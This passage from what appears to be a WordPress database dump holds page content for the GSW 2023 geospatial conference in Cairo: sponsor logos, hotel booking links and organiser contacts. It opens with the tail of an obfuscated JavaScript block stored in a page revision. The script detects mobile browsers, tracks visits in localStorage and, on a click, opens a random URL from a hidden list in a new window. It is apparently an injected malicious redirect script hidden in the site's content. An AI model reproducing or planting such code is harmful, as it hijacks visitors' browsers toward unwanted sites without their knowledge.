)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-07 12:54:12','2023-08-07 12:54:12','',3066,'https://gsw2023.com/?p=5083',0,'revision','',0),
(5084,1,'2023-08-08 15:25:00','2023-08-08 15:25:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508192388{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\">\n<h3 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></h3>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></p>\n<p style=\"text-align: center;\">\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 